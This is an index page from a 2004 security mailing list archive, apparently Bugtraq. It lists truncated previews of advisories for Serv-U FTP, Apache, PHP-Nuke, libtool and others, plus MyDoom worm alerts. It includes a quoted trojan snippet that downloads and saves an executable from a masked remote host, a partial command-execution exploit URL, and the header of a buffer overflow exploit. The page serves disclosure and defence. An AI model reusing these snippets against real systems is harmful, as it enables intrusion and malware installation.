|
Colapse all |
Post message
US CERT Technical Alert TA04-028A MyDoom.B Rapidly Spreading 2004-01-29 CERT Advisory (cert-advisory cert org) [HUC] Serv-U FTPD 3.x/4.x "SITE CHMOD" Command remote exploit V2.0 2004-02-02 lion (lion cnhonker net) /* *----------------------------------------------------------------------- * * Servu.c - Serv-U FTPD 3.x/4.x "SITE CHMOD" Command * Remote stack buffer overflow exploit * * Copyright (C) 2004 HUC All Rights Reserved. * * Author : lion * : lion (at) cnhonker (dot) net [email concealed] * : http:// [ more ] [ reply ] BUG IN APACHE HTTPD SERVER (current version 2.0.47) 2004-01-31 Vietnamese Security Group (security security com vn) APACHE HTTPD SERVER (current version 2.0.47): ########################################################## How to return files in a Apache Deny All directory. The Directives controlling host access may be bypassed even if they have not permission to be override. 11 Jan 2004 DESCRIPTION [ more ] [ reply ] Directory Traversal in Aprox PHP Portal. 2004-01-31 Zero_X www.lobnan.de Team (zero-x linuxmail org) Symlink Vulnerability in GNU libtool <1.5.2 2004-01-30 Stefan Nordhausen (deletethis nordhaus informatik hu-berlin de) Vulnerable: libtool <1.5.2 Not Vulnerable: libtool 1.5.2 Project website: http://www.gnu.org/software/libtool/libtool.html Description of libtool (from website): "GNU libtool is a generic library support script. Libtool hides the complexity of using shared libraries behind a consistent, porta [ more ] [ reply ] Refuting tall-tales and stories about the Mydoom worms 2004-01-30 Gadi Evron (ge egotistical reprehensible net) The document contains information and reverse engineering bits of the Mydoom worms, refuting claims and rumors about them with facts. It updates http://www.math.org.il/newworm-digest1.txt. Also, we provide proof within the document of the DDoS attack that many in the world now report does not ha [ more ] [ reply ] Vulnerabilities in Crob FTP Server V3.5.1 2004-02-01 Zero_X www.lobnan.de Team (zero-x linuxmail org) [FLSA-2004:1222] Updated tcpdump resolves security vulnerabilites (resend with correct paths) 2004-01-31 Jesse Keating (jkeating j2solutions net) another Trojan with the ADO hole? + a twist in the story 2004-01-31 Gadi Evron (ge egotistical reprehensible net) The past Trojan horses which spread this way took advantage of the fact web servers send an HTML 404 message if a file doesn't exist. The original sample - britney.jpg - was simply an html file itself, and using that fact, and IE loading it. It was combined with one of the latest exploits of the [ more ] [ reply ] [SCSA-027] PHP-Nuke 6.9 SQL Injection Vulnerability 2004-02-01 advisory security-corporation com ====================================================================== Security Corporation Security Advisory [SCSA-027] PHP-Nuke 6.9 SQL Injection Vulnerability ====================================================================== PROGRAM: PHP-Nuke HOMEPAGE: http://www.phpnuke.org VULNERABLE VER [ more ] [ reply ] [FLSA-2004:1193] Updated ethereal resolves security vulnerabilites 2004-02-01 Jesse Keating (jkeating j2solutions net) sqwebmail web login 2004-01-31 Marco Marabelli (mm smrt it) platform: linux 2.4 i386 pachages: qmail+sqwebmail+qmailadmin+vpopmail-vchkpw-auth. When user root try loggin in on the web on http://domain/cgi-bin/sqwebmail, if does it with right root password, sqwebmail gives an error "maildir doesn't exist or has incorrect ownership or permission". This, O [ more ] [ reply ] CoDeX-W0rm - what happened here? 2004-02-01 Chuck Rock (carock epcusa com) One of my stupid Windows servers has been hacked, and was running Serv-U FTP with a login message of "This Pubstro Hacked By Mediax!" I found what Pubstro's are, but when searching through the files in the Serv-U folder, I found this in the install.log CoDeX-W0rm has infiltrated the system succesf [ more ] [ reply ] Re: Oracle toplink mapping workbench password algorithm 2004-01-28 Martin (broadcast mail ptraced net) Read the link, really interesting. There's a tiny mistake there tho, on the example. 97 + 112 does not equal 224, no matter what. I was coding a PERL script to decrypt the passwords, and I took the 'pa' '74E0' example, since I was a bit lazy to code a "crypter". Well, here's a PERL script that will [ more ] [ reply ] Re: new WIN virus? 2004-01-29 K-OTiK Security (Special-Alerts k-otik com) In-Reply-To: <Pine.BSF.4.58.0401290056100.39640 (at) erfrnepu.fhfcvpvbhf (dot) bet [email concealed]> This is a lame trojan? trying to exploit the Windows Media Player/Internet Explorer vulnerability (greetz to Liu Die Yu) x.Open("GET", "http://www.****.ru/dan/updatte.exe",0); [...] s.SaveToFile("C:\\Program Files\\Window [ more ] [ reply ] [SECURITY] [DSA 431-1] New perl packages fix information leak in suidperl 2004-02-01 Matt Zimmerman (mdz debian org) Web Blog 1.1 Remote Execute Commands Bug 2004-01-29 ActualMInd (actualmind liberdadeaffix org) Product: Web Blog 1.1 Remote Execute Commands Bug Affected Versions: 1.1.5 Bug: Command Remote Execution Credits: n3rd - Lit Security Solutions (LiSS) #Affix in irc.brasnet.org Vendor: http://leifwright.com Exploiting: http://address/directory/blog.cgi?submit=ViewFile&month=[month]&year=[ye ar]& [ more ] [ reply ] |
|
Privacy Statement |
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
MyDoom.B Rapidly Spreading
Mydoom.B is a new variant of the Mydoom worm and is about 29,184
bytes. This variant attempts to perform a Distributed Denial of
Service (DDoS) attack against Microsoft.com. Details regarding this
new worm are
[ more ] [ reply ]